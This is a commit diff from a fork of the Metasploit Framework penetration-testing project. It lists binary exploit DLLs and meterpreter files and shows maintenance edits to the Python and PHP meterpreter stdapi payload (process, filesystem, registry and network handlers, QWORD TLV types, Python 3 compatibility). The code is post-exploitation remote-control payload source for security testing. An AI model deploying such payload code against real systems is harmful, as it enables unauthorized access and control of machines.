dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Merge branch 'master' of git://github.com/rapid7/metasploit-framework into dlink_upnp_msearch_command_injection

This commit is contained in:
Michael Messner 2014-07-08 21:39:53 +02:00
parent e5b441314c 4eeab66ebe
commit 51001f9cb3
372 changed files with 19540 additions and 1785 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
.gitignore vendored
View File

@ -1,4 +1,6 @@
.bundle
Gemfile.local
Gemfile.local.lock
# Rubymine project directory
.idea
# Sublime Text project directory (not created by ST by default)

1
.mailmap
View File

@ -18,6 +18,7 @@ todb-r7 <todb-r7@github> Tod Beardsley <tod_beardsley@rapid7.com>
todb-r7 <todb-r7@github> Tod Beardsley <todb@metasploit.com>
todb-r7 <todb-r7@github> Tod Beardsley <todb@packetfu.com>
trosen-r7 <trosen-r7@github> Trevor Rosen <Trevor_Rosen@rapid7.com>
trosen-r7 <trosen-r7@github> Trevor Rosen <trevor@catapult-creative.com>
wchen-r7 <wchen-r7@github> sinn3r <msfsinn3r@gmail.com> # aka sinn3r
wchen-r7 <wchen-r7@github> sinn3r <wei_chen@rapid7.com>
wchen-r7 <wchen-r7@github> Wei Chen <Wei_Chen@rapid7.com>

2
.ruby-version
View File

@ -1 +1 @@
1.9.3-p484
1.9.3-p547

2
CONTRIBUTING.md
View File

@ -50,7 +50,7 @@ Pull requests [#2940](https://github.com/rapid7/metasploit-framework/pull/2940)
#### New Modules
* **Do** run `tools/msftidy.rb` against your module and fix any errors or warnings that come up. Even better would be to set up `msftidy.rb` as a [pre-commit hook](https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb).
* **Do** use the [many module mixin APIs](https://dev.metasploit.com/documents/api/). Wheel improvements are welcome; wheel reinventions, not so much.
* **Do** use the [many module mixin APIs](https://dev.metasploit.com/api/). Wheel improvements are welcome; wheel reinventions, not so much.
* **Don't** include more than one module per pull request.
#### Library Code

8
Gemfile
View File

@ -10,18 +10,20 @@ gem 'json'
gem 'msgpack'
# Needed by anemone crawler
gem 'nokogiri'
# Needed by db.rb and Msf::Exploit::Capture
gem 'packetfu', '1.1.9'
# Needed by JSObfu
gem 'rkelly-remix', '0.0.6'
# Needed by anemone crawler
gem 'robots'
# Needed by db.rb and Msf::Exploit::Capture
gem 'packetfu', '1.1.9'
# Needed for some post modules
gem 'sqlite3'
group :db do
# Needed for Msf::DbManager
gem 'activerecord', '>= 3.0.0', '< 4.0.0'
# Database models shared between framework and Pro.
gem 'metasploit_data_models', '~> 0.17.0'
gem 'metasploit_data_models', '0.17.0'
# Needed for module caching in Mdm::ModuleDetails
gem 'pg', '>= 0.11'
end

36
Gemfile.local.example Normal file
View File

@ -0,0 +1,36 @@
##
# Example Gemfile.local file for Metasploit Framework
#
# The Gemfile.local file provides a way to use other gems that are not
# included in the standard Gemfile provided with Metasploit.
# This filename is included in Metasploit's .gitignore file, so local changes
# to this file will not accidentally show up in future pull requests. This
# example Gemfile.local includes all gems in Gemfile using instance_eval.
# It also creates a new bundle group, 'local', to hold additional gems.
#
# This file will not be used by default within the framework. As such, one
# must first install the custom Gemfile.local with bundle:
# bundle install --gemfile Gemfile.local
#
# Note that msfupdate does not consider Gemfile.local when updating the
# framework. If it is used, it may be necessary to run the above bundle
# command after the update.
#
###
# Include the Gemfile included with the framework. This is very
# important for picking up new gem dependencies.
msf_gemfile = File.join(File.dirname(__FILE__), 'Gemfile')
if File.readable?(msf_gemfile)
instance_eval(File.read(msf_gemfile))
end
# Create a custom group
group :local do
# Use pry to help view and interact with objects in the framework
gem 'pry', '~> 0.9'
# Use pry-debugger to step through code during development
gem 'pry-debugger', '~> 0.2'
# Add the lab gem so that the 'lab' plugin will work again
gem 'lab', '~> 0.2.7'
end

4
Gemfile.lock
View File

@ -53,6 +53,7 @@ GEM
multi_json (~> 1.0.3)
simplecov-html (~> 0.5.3)
simplecov-html (0.5.3)
sqlite3 (1.3.9)
timecop (0.6.3)
tzinfo (0.3.37)
yard (0.8.7)
@ -68,7 +69,7 @@ DEPENDENCIES
factory_girl (>= 4.1.0)
fivemat (= 1.2.1)
json
metasploit_data_models (~> 0.17.0)
metasploit_data_models (= 0.17.0)
msgpack
network_interface (~> 0.0.1)
nokogiri
@ -82,5 +83,6 @@ DEPENDENCIES
rspec (>= 2.12)
shoulda-matchers
simplecov (= 0.5.4)
sqlite3
timecop
yard

4
LICENSE
View File

@ -36,6 +36,10 @@ Files: external/ruby-lorcon/*
Copyright: 2005, dragorn and Joshua Wright
License: LGPL-2.1
Files: external/source/exploits/IE11SandboxEscapes/*
Copyright: James Forshaw, 2014
License: GPLv3
Files: external/source/byakugan/*
Copyright: Lurene Grenier, 2009
License: BSD-3-clause

BIN
data/android/apk/AndroidManifest.xml
View File

Binary file not shown.

BIN
data/android/apk/classes.dex
View File

Binary file not shown.

BIN
data/android/apk/res/drawable-mdpi/icon.png
View File

Binary file not shown.
Side by Side

Before

Width:  |  Height:  |  Size: 3.0 KiB

BIN
data/android/apk/res/layout/main.xml
View File

Binary file not shown.

BIN
data/android/apk/resources.arsc
View File

Binary file not shown.

BIN
data/android/libs/armeabi/libndkstager.so Normal file
View File

Binary file not shown.

BIN
data/android/libs/mips/libndkstager.so Normal file
View File

Binary file not shown.

BIN
data/android/libs/x86/libndkstager.so Normal file
View File

Binary file not shown.

BIN
data/android/meterpreter.jar
View File

Binary file not shown.

BIN
data/android/metstage.jar
View File

Binary file not shown.

BIN
data/android/shell.jar
View File

Binary file not shown.

BIN
data/exploits/CVE-2013-5045/CVE-2013-5045.dll Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2014-0257/CVE-2014-0257.dll Executable file
View File

Binary file not shown.

13
data/js/detect/os.js
View File

@ -20,6 +20,7 @@ arch_armle = "armle";
arch_x86 = "x86";
arch_x86_64 = "x86_64";
arch_ppc = "ppc";
arch_mipsle = "mipsle";
window.os_detect = {};
@ -184,9 +185,15 @@ window.os_detect.getVersion = function(){
} else if (platform.match(/arm/)) {
// Android and maemo
arch = arch_armle;
if (navigator.userAgent.match(/android/i)) {
os_flavor = 'Android';
}
} else if (platform.match(/x86/)) {
arch = arch_x86;
} else if (platform.match(/mips/)) {
arch = arch_mipsle;
}
if (navigator.userAgent.match(/android/i)) {
os_flavor = 'Android';
}
} else if (platform.match(/windows/)) {
os_name = oses_windows;

BIN
data/meterpreter/common.lib Executable file → Normal file
View File

Binary file not shown.

BIN
data/meterpreter/elevator.x64.dll Executable file → Normal file
View File

Binary file not shown.

BIN
data/meterpreter/elevator.x86.dll Executable file → Normal file
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_espia.x64.dll Executable file → Normal file
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_espia.x86.dll Executable file → Normal file
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_extapi.x64.dll Executable file → Normal file
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_extapi.x86.dll Executable file → Normal file
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_incognito.x64.dll Executable file → Normal file
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_incognito.x86.dll Executable file → Normal file
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_kiwi.x64.dll Executable file → Normal file
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_kiwi.x86.dll Executable file → Normal file
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_lanattacks.x64.dll Executable file → Normal file
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_lanattacks.x86.dll Executable file → Normal file
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_mimikatz.x64.dll Executable file → Normal file
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_mimikatz.x86.dll Executable file → Normal file
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_priv.x64.dll Executable file → Normal file
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_priv.x86.dll Executable file → Normal file
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_sniffer.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_sniffer.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_stdapi.jar
View File

Binary file not shown.

22
data/meterpreter/ext_server_stdapi.php
View File

@ -6,10 +6,10 @@
##
# General
##
define("TLV_TYPE_HANDLE", TLV_META_TYPE_UINT | 600);
define("TLV_TYPE_HANDLE", TLV_META_TYPE_QWORD | 600);
define("TLV_TYPE_INHERIT", TLV_META_TYPE_BOOL | 601);
define("TLV_TYPE_PROCESS_HANDLE", TLV_META_TYPE_UINT | 630);
define("TLV_TYPE_THREAD_HANDLE", TLV_META_TYPE_UINT | 631);
define("TLV_TYPE_PROCESS_HANDLE", TLV_META_TYPE_QWORD | 630);
define("TLV_TYPE_THREAD_HANDLE", TLV_META_TYPE_QWORD | 631);
##
# Fs
@ -65,7 +65,7 @@ define("PROCESS_EXECUTE_FLAG_SUSPENDED", (1 << 2));
define("PROCESS_EXECUTE_FLAG_USE_THREAD_TOKEN", (1 << 3));
# Registry
define("TLV_TYPE_HKEY", TLV_META_TYPE_UINT | 1000);
define("TLV_TYPE_HKEY", TLV_META_TYPE_QWORD | 1000);
define("TLV_TYPE_ROOT_KEY", TLV_TYPE_HKEY);
define("TLV_TYPE_BASE_KEY", TLV_META_TYPE_STRING | 1001);
define("TLV_TYPE_PERMISSION", TLV_META_TYPE_UINT | 1002);
@ -90,12 +90,12 @@ define("TLV_TYPE_ENV_GROUP", TLV_META_TYPE_GROUP | 1102);
define("DELETE_KEY_FLAG_RECURSIVE", (1 << 0));
# Process
define("TLV_TYPE_BASE_ADDRESS", TLV_META_TYPE_UINT | 2000);
define("TLV_TYPE_BASE_ADDRESS", TLV_META_TYPE_QWORD | 2000);
define("TLV_TYPE_ALLOCATION_TYPE", TLV_META_TYPE_UINT | 2001);
define("TLV_TYPE_PROTECTION", TLV_META_TYPE_UINT | 2002);
define("TLV_TYPE_PROCESS_PERMS", TLV_META_TYPE_UINT | 2003);
define("TLV_TYPE_PROCESS_MEMORY", TLV_META_TYPE_RAW | 2004);
define("TLV_TYPE_ALLOC_BASE_ADDRESS", TLV_META_TYPE_UINT | 2005);
define("TLV_TYPE_ALLOC_BASE_ADDRESS", TLV_META_TYPE_QWORD | 2005);
define("TLV_TYPE_MEMORY_STATE", TLV_META_TYPE_UINT | 2006);
define("TLV_TYPE_MEMORY_TYPE", TLV_META_TYPE_UINT | 2007);
define("TLV_TYPE_ALLOC_PROTECTION", TLV_META_TYPE_UINT | 2008);
@ -109,16 +109,16 @@ define("TLV_TYPE_PROCESS_ARGUMENTS", TLV_META_TYPE_STRING | 2305);
define("TLV_TYPE_IMAGE_FILE", TLV_META_TYPE_STRING | 2400);
define("TLV_TYPE_IMAGE_FILE_PATH", TLV_META_TYPE_STRING | 2401);
define("TLV_TYPE_PROCEDURE_NAME", TLV_META_TYPE_STRING | 2402);
define("TLV_TYPE_PROCEDURE_ADDRESS", TLV_META_TYPE_UINT | 2403);
define("TLV_TYPE_IMAGE_BASE", TLV_META_TYPE_UINT | 2404);
define("TLV_TYPE_PROCEDURE_ADDRESS", TLV_META_TYPE_QWORD | 2403);
define("TLV_TYPE_IMAGE_BASE", TLV_META_TYPE_QWORD | 2404);
define("TLV_TYPE_IMAGE_GROUP", TLV_META_TYPE_GROUP | 2405);
define("TLV_TYPE_IMAGE_NAME", TLV_META_TYPE_STRING | 2406);
define("TLV_TYPE_THREAD_ID", TLV_META_TYPE_UINT | 2500);
define("TLV_TYPE_THREAD_PERMS", TLV_META_TYPE_UINT | 2502);
define("TLV_TYPE_EXIT_CODE", TLV_META_TYPE_UINT | 2510);
define("TLV_TYPE_ENTRY_POINT", TLV_META_TYPE_UINT | 2511);
define("TLV_TYPE_ENTRY_PARAMETER", TLV_META_TYPE_UINT | 2512);
define("TLV_TYPE_ENTRY_POINT", TLV_META_TYPE_QWORD | 2511);
define("TLV_TYPE_ENTRY_PARAMETER", TLV_META_TYPE_QWORD | 2512);
define("TLV_TYPE_CREATION_FLAGS", TLV_META_TYPE_UINT | 2513);
define("TLV_TYPE_REGISTER_NAME", TLV_META_TYPE_STRING | 2540);
@ -137,7 +137,7 @@ define("TLV_TYPE_DESKTOP", TLV_META_TYPE_STRING | 3002);
# Event Log
##
define("TLV_TYPE_EVENT_SOURCENAME", TLV_META_TYPE_STRING | 4000);
define("TLV_TYPE_EVENT_HANDLE", TLV_META_TYPE_UINT | 4001);
define("TLV_TYPE_EVENT_HANDLE", TLV_META_TYPE_QWORD | 4001);
define("TLV_TYPE_EVENT_NUMRECORDS", TLV_META_TYPE_UINT | 4002);
define("TLV_TYPE_EVENT_READFLAGS", TLV_META_TYPE_UINT | 4003);

144
data/meterpreter/ext_server_stdapi.py
View File

@ -48,6 +48,24 @@ try:
except ImportError:
has_winreg = False
try:
import winreg
has_winreg = True
except ImportError:
has_winreg = (has_winreg or False)
if sys.version_info[0] < 3:
is_str = lambda obj: issubclass(obj.__class__, str)
is_bytes = lambda obj: issubclass(obj.__class__, str)
bytes = lambda *args: str(*args[:1])
NULL_BYTE = '\x00'
else:
is_str = lambda obj: issubclass(obj.__class__, __builtins__['str'])
is_bytes = lambda obj: issubclass(obj.__class__, bytes)
str = lambda x: __builtins__['str'](x, 'UTF-8')
NULL_BYTE = bytes('\x00', 'UTF-8')
long = int
if has_ctypes:
#
# Windows Structures
@ -234,6 +252,7 @@ TLV_META_TYPE_STRING = (1 << 16)
TLV_META_TYPE_UINT = (1 << 17)
TLV_META_TYPE_RAW = (1 << 18)
TLV_META_TYPE_BOOL = (1 << 19)
TLV_META_TYPE_QWORD = (1 << 20)
TLV_META_TYPE_COMPRESSED = (1 << 29)
TLV_META_TYPE_GROUP = (1 << 30)
TLV_META_TYPE_COMPLEX = (1 << 31)
@ -266,10 +285,10 @@ TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54
##
# General
##
TLV_TYPE_HANDLE = TLV_META_TYPE_UINT | 600
TLV_TYPE_HANDLE = TLV_META_TYPE_QWORD | 600
TLV_TYPE_INHERIT = TLV_META_TYPE_BOOL | 601
TLV_TYPE_PROCESS_HANDLE = TLV_META_TYPE_UINT | 630
TLV_TYPE_THREAD_HANDLE = TLV_META_TYPE_UINT | 631
TLV_TYPE_PROCESS_HANDLE = TLV_META_TYPE_QWORD | 630
TLV_TYPE_THREAD_HANDLE = TLV_META_TYPE_QWORD | 631
##
# Fs
@ -328,7 +347,7 @@ TLV_TYPE_SHUTDOWN_HOW = TLV_META_TYPE_UINT | 1530
##
# Registry
##
TLV_TYPE_HKEY = TLV_META_TYPE_UINT | 1000
TLV_TYPE_HKEY = TLV_META_TYPE_QWORD | 1000
TLV_TYPE_ROOT_KEY = TLV_TYPE_HKEY
TLV_TYPE_BASE_KEY = TLV_META_TYPE_STRING | 1001
TLV_TYPE_PERMISSION = TLV_META_TYPE_UINT | 1002
@ -358,12 +377,12 @@ DELETE_KEY_FLAG_RECURSIVE = (1 << 0)
##
# Process
##
TLV_TYPE_BASE_ADDRESS = TLV_META_TYPE_UINT | 2000
TLV_TYPE_BASE_ADDRESS = TLV_META_TYPE_QWORD | 2000
TLV_TYPE_ALLOCATION_TYPE = TLV_META_TYPE_UINT | 2001
TLV_TYPE_PROTECTION = TLV_META_TYPE_UINT | 2002
TLV_TYPE_PROCESS_PERMS = TLV_META_TYPE_UINT | 2003
TLV_TYPE_PROCESS_MEMORY = TLV_META_TYPE_RAW | 2004
TLV_TYPE_ALLOC_BASE_ADDRESS = TLV_META_TYPE_UINT | 2005
TLV_TYPE_ALLOC_BASE_ADDRESS = TLV_META_TYPE_QWORD | 2005
TLV_TYPE_MEMORY_STATE = TLV_META_TYPE_UINT | 2006
TLV_TYPE_MEMORY_TYPE = TLV_META_TYPE_UINT | 2007
TLV_TYPE_ALLOC_PROTECTION = TLV_META_TYPE_UINT | 2008
@ -379,16 +398,16 @@ TLV_TYPE_PARENT_PID = TLV_META_TYPE_UINT | 2307
TLV_TYPE_IMAGE_FILE = TLV_META_TYPE_STRING | 2400
TLV_TYPE_IMAGE_FILE_PATH = TLV_META_TYPE_STRING | 2401
TLV_TYPE_PROCEDURE_NAME = TLV_META_TYPE_STRING | 2402
TLV_TYPE_PROCEDURE_ADDRESS = TLV_META_TYPE_UINT | 2403
TLV_TYPE_IMAGE_BASE = TLV_META_TYPE_UINT | 2404
TLV_TYPE_PROCEDURE_ADDRESS = TLV_META_TYPE_QWORD | 2403
TLV_TYPE_IMAGE_BASE = TLV_META_TYPE_QWORD | 2404
TLV_TYPE_IMAGE_GROUP = TLV_META_TYPE_GROUP | 2405
TLV_TYPE_IMAGE_NAME = TLV_META_TYPE_STRING | 2406
TLV_TYPE_THREAD_ID = TLV_META_TYPE_UINT | 2500
TLV_TYPE_THREAD_PERMS = TLV_META_TYPE_UINT | 2502
TLV_TYPE_EXIT_CODE = TLV_META_TYPE_UINT | 2510
TLV_TYPE_ENTRY_POINT = TLV_META_TYPE_UINT | 2511
TLV_TYPE_ENTRY_PARAMETER = TLV_META_TYPE_UINT | 2512
TLV_TYPE_ENTRY_POINT = TLV_META_TYPE_QWORD | 2511
TLV_TYPE_ENTRY_PARAMETER = TLV_META_TYPE_QWORD | 2512
TLV_TYPE_CREATION_FLAGS = TLV_META_TYPE_UINT | 2513
TLV_TYPE_REGISTER_NAME = TLV_META_TYPE_STRING | 2540
@ -407,7 +426,7 @@ TLV_TYPE_DESKTOP = TLV_META_TYPE_STRING | 3002
# Event Log
##
TLV_TYPE_EVENT_SOURCENAME = TLV_META_TYPE_STRING | 4000
TLV_TYPE_EVENT_HANDLE = TLV_META_TYPE_UINT | 4001
TLV_TYPE_EVENT_HANDLE = TLV_META_TYPE_QWORD | 4001
TLV_TYPE_EVENT_NUMRECORDS = TLV_META_TYPE_UINT | 4002
TLV_TYPE_EVENT_READFLAGS = TLV_META_TYPE_UINT | 4003
@ -498,11 +517,12 @@ def get_stat_buffer(path):
blocks = si.st_blocks
st_buf = struct.pack('<IHHH', si.st_dev, min(0xffff, si.st_ino), si.st_mode, si.st_nlink)
st_buf += struct.pack('<HHHI', si.st_uid, si.st_gid, 0, rdev)
st_buf += struct.pack('<IIII', si.st_size, si.st_atime, si.st_mtime, si.st_ctime)
st_buf += struct.pack('<IIII', si.st_size, long(si.st_atime), long(si.st_mtime), long(si.st_ctime))
st_buf += struct.pack('<II', blksize, blocks)
return st_buf
def netlink_request(req_type):
import select
# See RFC 3549
NLM_F_REQUEST = 0x0001
NLM_F_ROOT = 0x0100
@ -513,17 +533,25 @@ def netlink_request(req_type):
sock.bind((os.getpid(), 0))
seq = int(time.time())
nlmsg = struct.pack('IHHIIB15x', 32, req_type, (NLM_F_REQUEST | NLM_F_ROOT), seq, 0, socket.AF_UNSPEC)
sfd = os.fdopen(sock.fileno(), 'w+b')
sfd.write(nlmsg)
sock.send(nlmsg)
responses = []
response = cstruct_unpack(NLMSGHDR, sfd.read(ctypes.sizeof(NLMSGHDR)))
if not len(select.select([sock.fileno()], [], [], 0.5)[0]):
return responses
raw_response_data = sock.recv(0xfffff)
response = cstruct_unpack(NLMSGHDR, raw_response_data[:ctypes.sizeof(NLMSGHDR)])
raw_response_data = raw_response_data[ctypes.sizeof(NLMSGHDR):]
while response.type != NLMSG_DONE:
if response.type == NLMSG_ERROR:
break
response_data = sfd.read(response.len - 16)
response_data = raw_response_data[:(response.len - 16)]
responses.append(response_data)
response = cstruct_unpack(NLMSGHDR, sfd.read(ctypes.sizeof(NLMSGHDR)))
sfd.close()
raw_response_data = raw_response_data[len(response_data):]
if not len(raw_response_data):
if not len(select.select([sock.fileno()], [], [], 0.5)[0]):
break
raw_response_data = sock.recv(0xfffff)
response = cstruct_unpack(NLMSGHDR, raw_response_data[:ctypes.sizeof(NLMSGHDR)])
raw_response_data = raw_response_data[ctypes.sizeof(NLMSGHDR):]
sock.close()
return responses
@ -559,7 +587,7 @@ def channel_open_stdapi_fs_file(request, response):
else:
fmode = 'rb'
file_h = open(fpath, fmode)
channel_id = meterpreter.add_channel(file_h)
channel_id = meterpreter.add_channel(MeterpreterFile(file_h))
response += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
return ERROR_SUCCESS, response
@ -675,6 +703,7 @@ def stdapi_sys_process_execute(request, response):
proc_h.stderr = open(os.devnull, 'rb')
else:
proc_h = STDProcess(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
proc_h.echo_protection = True
proc_h.start()
else:
proc_h = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
@ -693,15 +722,15 @@ def stdapi_sys_process_getpid(request, response):
def stdapi_sys_process_get_processes_via_proc(request, response):
for pid in os.listdir('/proc'):
pgroup = ''
pgroup = bytes()
if not os.path.isdir(os.path.join('/proc', pid)) or not pid.isdigit():
continue
cmd = open(os.path.join('/proc', pid, 'cmdline'), 'rb').read(512).replace('\x00', ' ')
status_data = open(os.path.join('/proc', pid, 'status'), 'rb').read()
cmdline_file = open(os.path.join('/proc', pid, 'cmdline'), 'rb')
cmd = str(cmdline_file.read(512).replace(NULL_BYTE, bytes(' ', 'UTF-8')))
status_data = str(open(os.path.join('/proc', pid, 'status'), 'rb').read())
status_data = map(lambda x: x.split('\t',1), status_data.split('\n'))
status_data = filter(lambda x: len(x) == 2, status_data)
status = {}
for k, v in status_data:
for k, v in filter(lambda x: len(x) == 2, status_data):
status[k[:-1]] = v.strip()
ppid = status.get('PPid')
uid = status.get('Uid').split('\t', 1)[0]
@ -725,14 +754,14 @@ def stdapi_sys_process_get_processes_via_proc(request, response):
def stdapi_sys_process_get_processes_via_ps(request, response):
ps_args = ['ps', 'ax', '-w', '-o', 'pid,ppid,user,command']
proc_h = subprocess.Popen(ps_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
ps_output = proc_h.stdout.read()
ps_output = str(proc_h.stdout.read())
ps_output = ps_output.split('\n')
ps_output.pop(0)
for process in ps_output:
process = process.split()
if len(process) < 4:
break
pgroup = ''
pgroup = bytes()
pgroup += tlv_pack(TLV_TYPE_PID, int(process[0]))
pgroup += tlv_pack(TLV_TYPE_PARENT_PID, int(process[1]))
pgroup += tlv_pack(TLV_TYPE_USER_NAME, process[2])
@ -793,7 +822,7 @@ def stdapi_sys_process_get_processes_via_windll(request, response):
use = ctypes.c_ulong()
use.value = 0
ctypes.windll.advapi32.LookupAccountSidA(None, user_tkn.Sid, username, ctypes.byref(u_len), domain, ctypes.byref(d_len), ctypes.byref(use))
complete_username = ctypes.string_at(domain) + '\\' + ctypes.string_at(username)
complete_username = str(ctypes.string_at(domain)) + '\\' + str(ctypes.string_at(username))
k32.CloseHandle(tkn_h)
parch = windll_GetNativeSystemInfo()
is_wow64 = ctypes.c_ubyte()
@ -802,7 +831,7 @@ def stdapi_sys_process_get_processes_via_windll(request, response):
if k32.IsWow64Process(proc_h, ctypes.byref(is_wow64)):
if is_wow64.value:
parch = PROCESS_ARCH_X86
pgroup = ''
pgroup = bytes()
pgroup += tlv_pack(TLV_TYPE_PID, pe32.th32ProcessID)
pgroup += tlv_pack(TLV_TYPE_PARENT_PID, pe32.th32ParentProcessID)
pgroup += tlv_pack(TLV_TYPE_USER_NAME, complete_username)
@ -850,16 +879,18 @@ def stdapi_fs_delete_dir(request, response):
@meterpreter.register_function
def stdapi_fs_delete_file(request, response):
file_path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
os.unlink(file_path)
if os.path.exists(file_path):
os.unlink(file_path)
return ERROR_SUCCESS, response
@meterpreter.register_function
def stdapi_fs_file_expand_path(request, response):
path_tlv = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value']
if has_windll:
path_tlv = ctypes.create_string_buffer(bytes(path_tlv, 'UTF-8'))
path_out = (ctypes.c_char * 4096)()
path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(path_tlv, ctypes.byref(path_out), ctypes.sizeof(path_out))
result = ''.join(path_out)[:path_out_len]
path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(ctypes.byref(path_tlv), ctypes.byref(path_out), ctypes.sizeof(path_out))
result = str(ctypes.string_at(path_out))
elif path_tlv == '%COMSPEC%':
result = '/bin/sh'
elif path_tlv in ['%TEMP%', '%TMP%']:
@ -912,7 +943,8 @@ def stdapi_fs_md5(request, response):
@meterpreter.register_function
def stdapi_fs_mkdir(request, response):
dir_path = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value']
os.mkdir(dir_path)
if not os.path.isdir(dir_path):
os.mkdir(dir_path)
return ERROR_SUCCESS, response
@meterpreter.register_function
@ -965,7 +997,7 @@ def stdapi_fs_stat(request, response):
@meterpreter.register_function
def stdapi_net_config_get_interfaces(request, response):
if hasattr(socket, 'AF_NETLINK'):
if hasattr(socket, 'AF_NETLINK') and hasattr(socket, 'NETLINK_ROUTE'):
interfaces = stdapi_net_config_get_interfaces_via_netlink()
elif has_osxsc:
interfaces = stdapi_net_config_get_interfaces_via_osxsc()
@ -974,7 +1006,7 @@ def stdapi_net_config_get_interfaces(request, response):
else:
return ERROR_FAILURE, response
for iface_info in interfaces:
iface_tlv = ''
iface_tlv = bytes()
iface_tlv += tlv_pack(TLV_TYPE_MAC_NAME, iface_info.get('name', 'Unknown'))
iface_tlv += tlv_pack(TLV_TYPE_MAC_ADDRESS, iface_info.get('hw_addr', '\x00\x00\x00\x00\x00\x00'))
if 'mtu' in iface_info:
@ -1002,7 +1034,7 @@ def stdapi_net_config_get_interfaces_via_netlink():
0x0100: 'PROMISC',
0x1000: 'MULTICAST'
}
iface_flags_sorted = iface_flags.keys()
iface_flags_sorted = list(iface_flags.keys())
# Dictionaries don't maintain order
iface_flags_sorted.sort()
interfaces = {}
@ -1106,7 +1138,7 @@ def stdapi_net_config_get_interfaces_via_osxsc():
hw_addr = hw_addr.replace(':', '')
hw_addr = hw_addr.decode('hex')
iface_info['hw_addr'] = hw_addr
ifnames = interfaces.keys()
ifnames = list(interfaces.keys())
ifnames.sort()
for iface_name, iface_info in interfaces.items():
iface_info['index'] = ifnames.index(iface_name)
@ -1138,7 +1170,10 @@ def stdapi_net_config_get_interfaces_via_windll():
iface_info['index'] = AdapterAddresses.u.s.IfIndex
if AdapterAddresses.PhysicalAddressLength:
iface_info['hw_addr'] = ctypes.string_at(ctypes.byref(AdapterAddresses.PhysicalAddress), AdapterAddresses.PhysicalAddressLength)
iface_info['name'] = str(ctypes.wstring_at(AdapterAddresses.Description))
iface_desc = ctypes.wstring_at(AdapterAddresses.Description)
if not is_str(iface_desc):
iface_desc = str(iface_desc)
iface_info['name'] = iface_desc
iface_info['mtu'] = AdapterAddresses.Mtu
pUniAddr = AdapterAddresses.FirstUnicastAddress
while pUniAddr:
@ -1174,7 +1209,7 @@ def stdapi_net_config_get_interfaces_via_windll_mib():
table_data = ctypes.string_at(table, pdwSize.value)
entries = struct.unpack('I', table_data[:4])[0]
table_data = table_data[4:]
for i in xrange(entries):
for i in range(entries):
addrrow = cstruct_unpack(MIB_IPADDRROW, table_data)
ifrow = MIB_IFROW()
ifrow.dwIndex = addrrow.dwIndex
@ -1244,9 +1279,10 @@ def stdapi_registry_close_key(request, response):
def stdapi_registry_create_key(request, response):
root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8'))
permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS)
res_key = ctypes.c_void_p()
if ctypes.windll.advapi32.RegCreateKeyExA(root_key, base_key, 0, None, 0, permission, None, ctypes.byref(res_key), None) == ERROR_SUCCESS:
if ctypes.windll.advapi32.RegCreateKeyExA(root_key, ctypes.byref(base_key), 0, None, 0, permission, None, ctypes.byref(res_key), None) == ERROR_SUCCESS:
response += tlv_pack(TLV_TYPE_HKEY, res_key.value)
return ERROR_SUCCESS, response
return ERROR_FAILURE, response
@ -1255,18 +1291,20 @@ def stdapi_registry_create_key(request, response):
def stdapi_registry_delete_key(request, response):
root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8'))
flags = packet_get_tlv(request, TLV_TYPE_FLAGS)['value']
if (flags & DELETE_KEY_FLAG_RECURSIVE):
result = ctypes.windll.shlwapi.SHDeleteKeyA(root_key, base_key)
result = ctypes.windll.shlwapi.SHDeleteKeyA(root_key, ctypes.byref(base_key))
else:
result = ctypes.windll.advapi32.RegDeleteKeyA(root_key, base_key)
result = ctypes.windll.advapi32.RegDeleteKeyA(root_key, ctypes.byref(base_key))
return result, response
@meterpreter.register_function_windll
def stdapi_registry_delete_value(request, response):
root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value']
result = ctypes.windll.advapi32.RegDeleteValueA(root_key, value_name)
value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8'))
result = ctypes.windll.advapi32.RegDeleteValueA(root_key, ctypes.byref(value_name))
return result, response
@meterpreter.register_function_windll
@ -1335,9 +1373,10 @@ def stdapi_registry_load_key(request, response):
def stdapi_registry_open_key(request, response):
root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8'))
